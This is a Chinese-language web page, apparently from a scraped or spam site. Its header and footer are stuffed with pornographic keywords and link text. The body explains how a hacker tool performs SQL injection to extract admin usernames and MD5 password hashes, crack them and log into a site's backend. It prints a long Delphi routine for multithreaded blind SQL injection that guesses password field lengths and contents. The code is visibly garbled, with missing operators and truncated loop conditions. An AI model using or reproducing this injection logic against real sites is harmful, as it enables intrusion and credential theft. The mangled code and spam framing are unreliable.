六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

黑客的腳本漏洞工具區(qū)分(圖)

發(fā)表時(shí)間:2023-07-31 來源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]上圖只是對(duì)一個(gè)網(wǎng)站注入點(diǎn)的工具檢測(cè),當(dāng)然看到了結(jié)果掃出來的密碼為16位的md5加密碼,但我們可以通過md5密碼破解工具進(jìn)行破解的。然后找 到后臺(tái)用所得的用戶名和密碼進(jìn)行登錄即可。對(duì)于黑客軟件,其實(shí)并...

黑客的腳本漏洞工具分析(圖)1
上圖只是對(duì)一個(gè)網(wǎng)站注入點(diǎn)的工具檢測(cè),當(dāng)然看到了結(jié)果掃出來的密碼為16位的md5加密碼,但我們可以通過md5密碼破解工具進(jìn)行破解的。然后找 到后臺(tái)用所得的用戶名和密碼進(jìn)行登錄即可。對(duì)于黑客軟件,其實(shí)并不是我們想象的那么復(fù)雜,只是根據(jù)掌握的漏洞信息提交相應(yīng)該的數(shù)據(jù)罷了,我們看下下面一段 用delphi寫的注入的片段就清楚不過了。這里控件的設(shè)置和線程的創(chuàng)建略,我們主要是看看猜解的過程,如下:
procedure TMainForm.GuessContProc(ListInt: integer); { SQL注入 - 多線程猜解字段內(nèi)容 }
function SQLTextFunc(URl, TopStr, TableName, FieldName, LevelStr: string; Len: integer): string;
begin
Result := Url ’ and exists(select * from ’ TableName ’ where len(’ FieldName ’)’ LevelStr IntToStr(Len) ’ and id=(Select max(id) From ’ TableName ’ where id in (select top ’ TOPStr ’ id from ’ TableName ’ Order by id)))’
end;
var
TableName: string;
FieldName, S: string;
ContentInt: integer;
i, Len, LengthInt, N: integer;
GridCount: integer;
Colu: TColumn;
FlagBool: boolean;
begin
Len := 0;
LengthInt := 0;
FlagBool := True;
TableName := TableNameLst.Items[TableNameLst.Itemindex];
FieldName := Memo2.Lines[ListInt];
if (LowerCase(FieldName) = ’password’) or (LowerCase(FieldName) = ’pass’) or
(LowerCase(FieldName) = ’admin_pass’) or (FieldName = ’密碼’) or
(LowerCase(FieldName) = ’userpassword’) or (LowerCase(FieldName) = ’passwd’) then
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, 16), 800);
if ContentInt >= and1Num then
begin
SqlResultMemo.Lines.Add(FieldName ’長度: 16’);
LengthInt := 16
end
else
begin
while (Len
begin
application.ProcessMessages;
inc(Len, 2);
Pane1.Caption := ’正在檢測(cè)長度:Len(’ FieldName ’)=’ inttostr(Len);
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’
if ContentInt >= and1Num then
begin
for N := Len - 1 to Len do
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);
if ContentInt >= and1Num then
begin
LengthInt := N;
SqlResultMemo.Lines.Add(FieldName ’長度: ’ inttostr(N));
FlagBool := False;
Break;
end; // if
end; // for
end; // if
end; // while
end;
end
else
begin
while (Len
begin
application.ProcessMessages;
inc(Len, 2);
Pane1.Caption := ’正在檢測(cè)長度:Len(’ FieldName ’)=’ inttostr(Len);
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’
if ContentInt >= and1Num then
begin
for N := Len - 1 to Len do
begin
ContentInt := Get_HttpSize(SQLTextFunc(sql_EdUrl.Text, sqlEdTop.Text, TableName, FieldName, ’=’, N), 800);
if ContentInt >= and1Num then
begin
LengthInt := N;
SqlResultMemo.Lines.Add(FieldName ’長度: ’ inttostr(N));
FlagBool := False;
Break;
end; // if
end; // for
end; // if
end; // while
end;
GuessLsv.Clear;
if Len >= 50 then
begin
sql_EdUrl.Enabled := True;
Sql_GuessTable.Enabled := True;
TableNameLst.Enabled := True;
FieldNameLst.Enabled := True;
application.MessageBox(’列名長度大于50,猜解失敗!’, ’提示’, 32);
Exit;
end;
Pane1.Caption := ’正在檢測(cè)’ FieldName ’的內(nèi)容...’;
GuessLsv.Update;
if LengthInt = 5 then
begin
ContentInt := Get_HttpSize(Sql_EdUrl.Text ’ and exists (select top ’ sqlEdTop.Text ’ ’ FieldName ’ from ’ TableName ’ where instr(’ FieldName ’,’’admin’’)=1 and len(username)=5)’);
if ContentInt >= and1Num then
begin
s := ’admin’;
for i := 1 to 5 do
begin
application.ProcessMessages;
with GuessLsv.Items.Add do
begin
caption := ’第’ inttostr(i) ’位’;
SubItems.Add(s);
end;
sleep(60);
GuessLsv.Update;
end;
inc(SQL_ScanContent_ThreadCreateCount);
StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount - 1, 1] := ’admin’;
StringGrid1.Cells[SQL_ScanContent_ThreadCreateCount, 1] := ’檢測(cè)中...’;
SqlResultMemo.Lines.Add(FieldNameLst.Items[FieldNameLst.Itemindex] ’內(nèi)容:admin’);
if SQL_ScanContent_ThreadCreateCount
GuessContProc(SQL_ScanContent_ThreadCreateCount - 1);
Exit;
end
else
begin
for i := 1 to LengthInt do
begin
application.ProcessMessages;
with GuessLsv.Items.Add do
begin
caption := ’第’ inttostr(i) ’位’;
SubItems.Add(’檢測(cè)中’);
end;
sleep(30);
end;
end;
end
else
begin
for i := 1 to LengthInt do
begin
application.ProcessMessages;
with GuessLsv.Items.Add do
begin
caption := ’第’ inttostr(i) ’位’;
SubItems.Add(’檢測(cè)中’);
end;
sleep(30);
end;
end;
從上面的代碼中,我們可以看出,黑客軟件只是代替了手工操作,通過多線程更進(jìn)一步提高了猜解的速度,但猜解的表和字段還得我們自己設(shè)定,然后通過 post提交我們?cè)O(shè)定的格式(其中url中的 是空格的意思,因?yàn)樵诰W(wǎng)址后面執(zhí)行相應(yīng)的sql語句時(shí)都要有相應(yīng)的空格),按照我們?cè)O(shè)定的表和字段猜解出相應(yīng)的用戶名和密碼內(nèi)容。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。
主站蜘蛛池模板: 青青草精品在线观看 | 一级黄色片免费的 | 欧美亚洲一区二区三区导航 | 日韩av线上 | 亚洲一区在线免费 | 午夜在线播放视频 | 青青青手机视频 | 中文黄色 | 最新在线精品国自产拍网站 | 亚洲最新在线 | 最新国语自产精品视频在 | 午夜亚洲精品 | 欧美亚洲啪啪 | 桃色网站入口 | 亚洲最大成人综合网 | 日韩中文字幕精品视频在线 | 亚洲综合中文 | 色伊人网 | 一级黄色网 | 色一情一乱一伦 | 天天透天天射 | 中文字幕在线三浦惠理子 | 日韩毛片免费视频 | 又粗又硬又爽的三级视频在线观看 | 在线视频一区二区 | 自拍视频在线播放 | 桃色app福利 | 亚洲欧美久久婷婷爱综合一区天堂 | 天天射狠狠干 | 亚洲欧美久久精品 | 视频在线日韩 | 欲色啪| 伊人影院在线观看 | 日韩黄色一级大片 | 伊人官网 | 日本免费在线视频 | 性a视频 | 日韩精品视频在线观看免费 | 欧美在线中文字幕高清的 | 日韩爱爱网站 | 速度与激情9免费观看 |